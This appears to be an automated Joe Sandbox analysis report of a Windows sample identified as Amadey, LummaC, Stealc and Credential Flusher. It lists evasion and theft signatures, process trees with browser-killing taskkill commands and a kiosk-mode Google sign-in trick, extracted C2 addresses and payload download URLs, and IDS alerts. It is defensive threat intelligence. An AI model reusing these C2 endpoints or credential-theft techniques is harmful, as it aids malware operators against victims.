Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1571971
MD5:f5db9dcea4098275cb46b5d6fe73cef8
SHA1:9b623e4cfff93bffbaf7034ebbf893773700ba94
SHA256:34959918550ef8a11fe8e0ef9dde5f85f0dac541e62a2cad53998d4a0eb07d9d
Tags:Amadeyexeuser-Bitsight
Infos:

Detection

Amadey, Credential Flusher, LummaC Stealer, Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found API chain indicative of sandbox detection
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 6936 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F5DB9DCEA4098275CB46B5D6FE73CEF8)
    • skotes.exe (PID: 2696 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: F5DB9DCEA4098275CB46B5D6FE73CEF8)
  • skotes.exe (PID: 4340 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: F5DB9DCEA4098275CB46B5D6FE73CEF8)
  • skotes.exe (PID: 7660 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: F5DB9DCEA4098275CB46B5D6FE73CEF8)
    • ae5cfd188c.exe (PID: 7872 cmdline: "C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe" MD5: 52F0F216DFBB86683B1E318A0796DD81)
      • chrome.exe (PID: 4420 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 3896 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1944,i,17281856634279828374,9724014430205040748,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 3232 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=ae5cfd188c.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 4868 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1164 --field-trial-handle=1988,i,16142706175083674967,2684589522950696221,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • 37df924488.exe (PID: 7148 cmdline: "C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe" MD5: CBF2B84F9B993A77C0E2170CCCBACB7C)
    • 2ada66c192.exe (PID: 1364 cmdline: "C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe" MD5: 5DD5F67D25C20DFF1AC926ABDC8C2EB0)
      • taskkill.exe (PID: 6600 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 7192 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 5824 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 5796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 1396 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 3300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 7348 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • firefox.exe (PID: 5020 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • 9c2827fca4.exe (PID: 5912 cmdline: "C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe" MD5: 6CFAA4B02B026AA1631EDA2E570A1298)
  • ae5cfd188c.exe (PID: 3512 cmdline: "C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe" MD5: 52F0F216DFBB86683B1E318A0796DD81)
  • firefox.exe (PID: 4040 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • firefox.exe (PID: 5932 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 6524 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2272 -parentBuildID 20230927232528 -prefsHandle 2192 -prefMapHandle 2184 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {55e86b5f-3953-4278-9a52-23c7c331b436} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 2ba49c6e110 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 6344 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4116 -parentBuildID 20230927232528 -prefsHandle 4068 -prefMapHandle 4064 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f1a1788-4a6a-4b44-adb8-7b34c81ea1a2} 5932 "\\.\pipe\gecko-crash-server-pipe.5932" 2ba5bd78210 rdd MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • 37df924488.exe (PID: 6796 cmdline: "C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe" MD5: CBF2B84F9B993A77C0E2170CCCBACB7C)
  • 2ada66c192.exe (PID: 4544 cmdline: "C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe" MD5: 5DD5F67D25C20DFF1AC926ABDC8C2EB0)
    • taskkill.exe (PID: 1596 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 5196 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 1700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 6720 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 6740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 5432 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • taskkill.exe (PID: 7616 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • conhost.exe (PID: 5304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • 9c2827fca4.exe (PID: 5040 cmdline: "C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe" MD5: 6CFAA4B02B026AA1631EDA2E570A1298)
  • 2ada66c192.exe (PID: 7148 cmdline: "C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe" MD5: 5DD5F67D25C20DFF1AC926ABDC8C2EB0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
{"C2 url": ["dare-curbys.biz", "print-vexer.biz", "zinc-sneark.biz", "se-blurry.biz", "atten-supporse.biz", "impend-differ.biz", "covery-mover.biz", "dwell-exclaim.biz", "formy-spill.biz"], "Build id": "LOGS11--LiveTraffic"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        00000007.00000003.2496625597.0000000000C54000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000A.00000003.2656254636.0000000000CC0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000A.00000003.2656059323.0000000000CC0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                0000000A.00000003.2722206799.0000000000CC5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  Click to see the 33 entries
                  SourceRuleDescriptionAuthorStrings
                  6.2.skotes.exe.aa0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    2.2.skotes.exe.aa0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      0.2.file.exe.9e0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        1.2.skotes.exe.aa0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

                          System Summary

                          barindex
                          Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7660, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ae5cfd188c.exe
                          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 7660, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ae5cfd188c.exe
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T23:09:16.121917+010020283713Unknown Traffic192.168.2.449781104.21.48.1443TCP
                          2024-12-09T23:09:18.382928+010020283713Unknown Traffic192.168.2.449790104.21.48.1443TCP
                          2024-12-09T23:09:20.710128+010020283713Unknown Traffic192.168.2.449800104.21.48.1443TCP
                          2024-12-09T23:09:23.068929+010020283713Unknown Traffic192.168.2.449806104.21.48.1443TCP
                          2024-12-09T23:09:25.602980+010020283713Unknown Traffic192.168.2.449814104.21.48.1443TCP
                          2024-12-09T23:09:28.738776+010020283713Unknown Traffic192.168.2.449821104.21.48.1443TCP
                          2024-12-09T23:09:29.565343+010020283713Unknown Traffic192.168.2.449827104.21.48.1443TCP
                          2024-12-09T23:09:31.795277+010020283713Unknown Traffic192.168.2.449833104.21.48.1443TCP
                          2024-12-09T23:09:31.873065+010020283713Unknown Traffic192.168.2.449834104.21.48.1443TCP
                          2024-12-09T23:09:34.050106+010020283713Unknown Traffic192.168.2.449842104.21.48.1443TCP
                          2024-12-09T23:09:36.781266+010020283713Unknown Traffic192.168.2.449852104.21.48.1443TCP
                          2024-12-09T23:09:39.172096+010020283713Unknown Traffic192.168.2.449861104.21.48.1443TCP
                          2024-12-09T23:09:40.181977+010020283713Unknown Traffic192.168.2.449864104.21.48.1443TCP
                          2024-12-09T23:09:43.332988+010020283713Unknown Traffic192.168.2.449880104.21.48.1443TCP
                          2024-12-09T23:09:46.291112+010020283713Unknown Traffic192.168.2.449897104.21.48.1443TCP
                          2024-12-09T23:09:48.316325+010020283713Unknown Traffic192.168.2.449906104.21.48.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T23:09:17.108244+010020546531A Network Trojan was detected192.168.2.449781104.21.48.1443TCP
                          2024-12-09T23:09:19.122038+010020546531A Network Trojan was detected192.168.2.449790104.21.48.1443TCP
                          2024-12-09T23:09:30.415077+010020546531A Network Trojan was detected192.168.2.449827104.21.48.1443TCP
                          2024-12-09T23:09:32.484134+010020546531A Network Trojan was detected192.168.2.449834104.21.48.1443TCP
                          2024-12-09T23:09:39.884353+010020546531A Network Trojan was detected192.168.2.449861104.21.48.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T23:09:17.108244+010020498361A Network Trojan was detected192.168.2.449781104.21.48.1443TCP
                          2024-12-09T23:09:30.415077+010020498361A Network Trojan was detected192.168.2.449827104.21.48.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T23:09:19.122038+010020498121A Network Trojan was detected192.168.2.449790104.21.48.1443TCP
                          2024-12-09T23:09:32.484134+010020498121A Network Trojan was detected192.168.2.449834104.21.48.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T23:09:16.121917+010020579221Domain Observed Used for C2 Detected192.168.2.449781104.21.48.1443TCP
                          2024-12-09T23:09:18.382928+010020579221Domain Observed Used for C2 Detected192.168.2.449790104.21.48.1443TCP
                          2024-12-09T23:09:20.710128+010020579221Domain Observed Used for C2 Detected192.168.2.449800104.21.48.1443TCP
                          2024-12-09T23:09:23.068929+010020579221Domain Observed Used for C2 Detected192.168.2.449806104.21.48.1443TCP
                          2024-12-09T23:09:25.602980+010020579221Domain Observed Used for C2 Detected192.168.2.449814104.21.48.1443TCP
                          2024-12-09T23:09:28.738776+010020579221Domain Observed Used for C2 Detected192.168.2.449821104.21.48.1443TCP
                          2024-12-09T23:09:29.565343+010020579221Domain Observed Used for C2 Detected192.168.2.449827104.21.48.1443TCP
                          2024-12-09T23:09:31.795277+010020579221Domain Observed Used for C2 Detected192.168.2.449833104.21.48.1443TCP
                          2024-12-09T23:09:31.873065+010020579221Domain Observed Used for C2 Detected192.168.2.449834104.21.48.1443TCP
                          2024-12-09T23:09:34.050106+010020579221Domain Observed Used for C2 Detected192.168.2.449842104.21.48.1443TCP
                          2024-12-09T23:09:36.781266+010020579221Domain Observed Used for C2 Detected192.168.2.449852104.21.48.1443TCP
                          2024-12-09T23:09:39.172096+010020579221Domain Observed Used for C2 Detected192.168.2.449861104.21.48.1443TCP
                          2024-12-09T23:09:40.181977+010020579221Domain Observed Used for C2 Detected192.168.2.449864104.21.48.1443TCP
                          2024-12-09T23:09:43.332988+010020579221Domain Observed Used for C2 Detected192.168.2.449880104.21.48.1443TCP
                          2024-12-09T23:09:46.291112+010020579221Domain Observed Used for C2 Detected192.168.2.449897104.21.48.1443TCP
                          2024-12-09T23:09:48.316325+010020579221Domain Observed Used for C2 Detected192.168.2.449906104.21.48.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T23:09:41.348882+010020197142Potentially Bad Traffic192.168.2.449868185.215.113.1680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T23:09:17.213328+010020446961A Network Trojan was detected192.168.2.449787185.215.113.4380TCP
                          2024-12-09T23:09:25.467841+010020446961A Network Trojan was detected192.168.2.449813185.215.113.4380TCP
                          2024-12-09T23:09:32.623757+010020446961A Network Trojan was detected192.168.2.449835185.215.113.4380TCP
                          2024-12-09T23:09:42.735490+010020446961A Network Trojan was detected192.168.2.449874185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T23:09:14.651408+010020579211Domain Observed Used for C2 Detected192.168.2.4574881.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T23:09:23.978093+010020480941Malware Command and Control Activity Detected192.168.2.449806104.21.48.1443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T23:09:25.594206+010020442431Malware Command and Control Activity Detected192.168.2.449807185.215.113.20680TCP
                          2024-12-09T23:09:42.038474+010020442431Malware Command and Control Activity Detected192.168.2.449870185.215.113.20680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T23:09:05.760341+010028561471A Network Trojan was detected192.168.2.449758185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T23:09:15.862202+010028561221A Network Trojan was detected185.215.113.4380192.168.2.449764TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T23:09:10.210118+010028033053Unknown Traffic192.168.2.449770185.215.113.1680TCP
                          2024-12-09T23:09:18.678022+010028033053Unknown Traffic192.168.2.449791185.215.113.1680TCP
                          2024-12-09T23:09:26.921965+010028033053Unknown Traffic192.168.2.449815185.215.113.1680TCP
                          2024-12-09T23:09:34.076166+010028033053Unknown Traffic192.168.2.449838185.215.113.1680TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-09T23:09:47.484483+010028438641A Network Trojan was detected192.168.2.449897104.21.48.1443TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: file.exeAvira: detected
                          Source: http://185.215.113.16/off/random.exebAvira URL Cloud: Label: malware
                          Source: http://185.215.113.43/Zu7JuNko/index.php95dAAvira URL Cloud: Label: malware
                          Source: http://185.215.113.206/c4becf79229cb002.php/aAvira URL Cloud: Label: malware
                          Source: http://185.215.113.43/Zu7JuNko/index.phpa4Avira URL Cloud: Label: malware
                          Source: http://185.215.113.16/steam/random.exe_Avira URL Cloud: Label: malware
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/ATRAPS.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: 00000002.00000002.1754799297.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                          Source: 0000001B.00000002.2764793088.000000000142B000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
                          Source: ae5cfd188c.exe.3512.10.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["dare-curbys.biz", "print-vexer.biz", "zinc-sneark.biz", "se-blurry.biz", "atten-supporse.biz", "impend-differ.biz", "covery-mover.biz", "dwell-exclaim.biz", "formy-spill.biz"], "Build id": "LOGS11--LiveTraffic"}
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeReversingLabs: Detection: 39%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeReversingLabs: Detection: 23%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exeReversingLabs: Detection: 44%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exeReversingLabs: Detection: 44%
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeReversingLabs: Detection: 39%
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeReversingLabs: Detection: 44%
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeReversingLabs: Detection: 23%
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeReversingLabs: Detection: 44%
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 55%
                          Source: file.exeReversingLabs: Detection: 55%
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                          Source: file.exeJoe Sandbox ML: detected
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49781 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49790 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49800 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49806 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49814 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49821 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49827 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49833 version: TLS 1.2
